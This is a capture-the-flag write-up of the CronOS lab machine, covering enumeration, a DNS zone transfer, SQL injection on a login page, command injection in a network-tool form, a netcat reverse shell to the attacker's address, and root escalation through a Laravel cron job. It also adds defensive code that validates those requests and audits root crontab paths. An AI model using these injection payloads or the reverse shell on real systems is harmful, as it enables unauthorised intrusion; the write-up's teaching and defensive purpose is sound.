CronOS

CronOS info-card WriteUp

Enumeration

1. Nmap

nmap -sV -oA nmap-out 10.10.10.13
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we are dealing with an Ubuntu machine hosting a web application. Port 53 is also open, with ISC BIND running on it. Let’s research that a little more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.

I was having problems connecting to the web service, so I added the IP (10.10.10.13) to the /etc/hosts file with the name cronos.htb.

2. DNS Enumeration

Check out the video from HackerSploit on DNS enumeration and zone transfers to understand the following lines.

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800  IN  NS  ns1.cronos.htb.
cronos.htb.        604800  IN  A   10.10.10.13
admin.cronos.htb.    604800  IN  A   10.10.10.13
ns1.cronos.htb.        604800  IN  A   10.10.10.13
www.cronos.htb.        604800  IN  A   10.10.10.13
cronos.htb.        604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)

The zone transfer revealed a few more hostnames under cronos.htb. Let’s add them to the /etc/hosts file too so we can reach them in the browser.

Admin.cronos.htb & SQLi

Browsing to admin.cronos.htb shows a login page.
A simple SQLi check on the login form lets us in.

The welcome.php page offers two tools, ping and traceroute. Poking at the application from Burp, I discovered command injection.

Request

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bls+.

I URL-encoded a semicolon (%3B) and appended the ls command to list the current directory.

Response

HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

<html">

   <head>
      <title>Net Tool v0.1 </title>
   </head>

   <body>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    </select>
    <input type="text" name="host" value="8.8.8.8"/>
    <input type="submit" value="Execute!"/>
    </form>
            config.php<br>
        index.php<br>
        logout.php<br>
        session.php<br>
        welcome.php<br>
              <p><a href = "logout.php">Sign Out</a></p>
   </body>

</html>
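
From the defender’s side, the host field plainly reaches a shell unescaped. The handler shape below is an added example, not code from the box or the write-up: it parses the same POST bodies shown above, allow-lists the command to the two values the form offers, and accepts only an IP address or a hostname, returning an argv that can be executed without a shell.

```python
import ipaddress
import re
from typing import List, Tuple, Union
from urllib.parse import parse_qs

# Constructed sample: the benign Net Tool request plus the three injected
# bodies from the write-up, percent-encoded exactly as Burp sent them.
BODIES = [
    "command=traceroute&host=8.8.8.8",
    "command=traceroute&host=8.8.8.8%3Bls+.",
    "command=traceroute&host=8.8.8.8%3Blocate+nc",
    "command=traceroute&host=8.8.8.8%3Bnc+10.10.14.2+1234+-e+/bin/bash",
]

# The only two values the form's <select> offers; anything else is rejected.
ALLOWED_COMMANDS = {"traceroute", "ping -c 1"}

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def valid_host(value: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def check_request(body: str) -> Tuple[bool, Union[str, List[str]]]:
    """Validate a Net Tool POST body: (True, argv) or (False, reason)."""
    params = parse_qs(body, keep_blank_values=True)
    command = params.get("command", [""])[0]
    host = params.get("host", [""])[0]          # parse_qs decodes %3B and '+'
    if command not in ALLOWED_COMMANDS:
        return False, f"command not in allow-list: {command!r}"
    if not valid_host(host):
        return False, f"host rejected: {host!r}"
    # argv for subprocess.run(argv) with no shell: a ';' could never be
    # interpreted as a command separator even if validation were loosened.
    return True, command.split() + [host]


if __name__ == "__main__":
    for body in BODIES:
        print(body, "->", check_request(body))
```

The PHP equivalent is the same allow-list on command plus escapeshellarg() on host, never string-concatenating user input into shell_exec().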

So we have confirmed a command injection vulnerability. Let’s see if netcat is present on the box so we can get a connection back to our host.

Request

<deleted>
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Blocate+nc

Response

<deleted>
cute!"/>
    </form>
            /bin/loginctl<br>
        /bin/nc<br>
        /bin/nc.openbsd<br>
</deleted>

There is a netcat binary on the machine. Let’s try to use it to our advantage.

Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bnc+10.10.14.2+1234+-e+/bin/bash

nc 10.10.14.2 1234 -e /bin/bash was unsuccessful. Perhaps a URI-encoding problem?

Check out this Reverse Shell Cheat Sheet

After trying several of the shells, the python2.7 one finally did the trick, and we have a shell as www-data.

# nc -nlvp  1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.13] 51718
/bin/sh: 0: can't access tty; job control turned off
$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Running sudo -l returned “no tty present”, so I upgraded my shell:

$ sudo -l
sudo: no tty present and no askpass program specified

$ python -c 'import pty;pty.spawn("/bin/bash")'

[email protected]:/home/noulis$ export TERM=xterm-256color
export TERM=xterm-256color

[email protected]:/home/noulis$ ^Z

[1]+  Stopped                 nc -nlvp 1234

# stty raw -echo

# fg
[1]+  Started                 nc -nlvp 1234

[email protected]:/home/noulis$ stty rows 25 columns 237
[email protected]:/home/noulis$ whoami
www-data
[email protected]:/home/noulis$ sudo -l
[sudo] password for www-data: 
Sorry, try again.

Now that the shell works as expected, let’s move on to:

Privesc

Crontab is the task scheduler on Linux systems, and it is usually the very first thing I check when doing Linux boxes. To see whether any tasks are scheduled, I “catted” the /etc/crontab file:

$ cat /etc/crontab

# m h dom mon dow user    command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Root is running the PHP script artisan from /var/www/laravel/ every minute. Let’s see what this file is and what it does.

$ cat artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);
[email protected]:/var/www/laravel$ 

So any command handed to this console application is executed as root. I needed more information about that, though.

Laravel scheduling tasks

After poking around artisan commands for a while, I found this page that sheds light on the matter:

Scheduling Shell Commands

The exec method may be used to issue a command to the operating system:

$schedule->exec('node /home/forge/script.js')->daily();

Finally, to grab the root flag, I schedule a command that copies root.txt to /tmp, changes its owner from root to www-data (me), and sets permissions so that I can read it.

protected function schedule(Schedule $schedule)
{
    $schedule->exec('cp /root/root.txt /tmp/;chown www-data:www-data /tmp/root.txt; chmod 4755 /tmp/root.txt')->everyMinute();
    // $schedule->command('inspire')
    //          ->hourly();
}

A minute later, we have a root.txt with the following permissions in /tmp/:

$ ls -la
total 40
drwxrwxrwt  9 root     root     4096 Apr 13 15:17 .
drwxr-xr-x 23 root     root     4096 Apr  9  2017 ..
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .ICE-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .Test-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .X11-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .XIM-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .font-unix
-rw-r--r--  1 root     root        0 Apr 13 15:11 catted.txt
-rwsr-xr-x  1 www-data www-data   33 Apr 13 15:17 root.txt
drwx------  3 root     root     4096 Apr 13 14:28 systemd-private-162edecf88ca4801b7de1bd826d2c653-systemd-timesyncd.service-JYRg0U
drwx------  2 root     root     4096 Apr 13 14:28 vmware-root
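
The root cause of this privesc is a root cron job executing a script that lives under a directory the web user owns. The auditor below is an added example, not from the write-up or the box: it parses the crontab lines shown above and flags any root job whose referenced path, or a parent of it, is not root-owned or is group/world writable. FAKE_FS is constructed, hypothetical metadata standing in for os.stat(); pass live_lookup instead to check a real host.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Tuple

# Constructed sample: the relevant /etc/crontab lines from the box.
CRONTAB = """\
# m h dom mon dow user    command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed, hypothetical stand-in for os.stat(): path -> (owner uid, mode).
# uid 0 is root, 33 is www-data; the Laravel tree is owned by the web user.
FAKE_FS: Dict[str, Tuple[int, int]] = {
    "/": (0, 0o755), "/etc": (0, 0o755), "/etc/cron.hourly": (0, 0o755),
    "/var": (0, 0o755), "/var/www": (0, 0o755),
    "/var/www/laravel": (33, 0o775), "/var/www/laravel/artisan": (33, 0o755),
}
fake_lookup = lambda p: FAKE_FS.get(p, (0, 0o755))  # unknown path: assume sane

def live_lookup(path: str) -> Tuple[int, int]:
    """Same interface, backed by the real filesystem."""
    st = os.stat(path)
    return st.st_uid, stat.S_IMODE(st.st_mode)

def ancestors(path: str) -> List[str]:
    """'/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c']."""
    parts = path.strip("/").split("/")
    return ["/"] + ["/" + "/".join(parts[: i + 1]) for i in range(len(parts))]

def audit_crontab(crontab: str, lookup: Callable[[str], Tuple[int, int]]) -> List[str]:
    """Flag root jobs whose referenced path (or a parent) a non-root user can change."""
    findings = []
    for line in crontab.splitlines():
        fields = line.strip().split(None, 6)   # m h dom mon dow user command
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue
        cmd = re.sub(r"\d*>>?&?\s*\S+", "", fields[6])   # drop '>> /dev/null 2>&1'
        for path in re.findall(r"(?<!\S)/[\w./-]+", cmd):
            for p in ancestors(path):
                uid, mode = lookup(p)
                if uid != 0 or mode & 0o022:              # not root's, or g/o-writable
                    findings.append(f"{path}: {p} uid={uid} mode={oct(mode)}")
                    break
    return findings

if __name__ == "__main__":
    print("\n".join(audit_crontab(CRONTAB, fake_lookup)) or "no findings")
```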
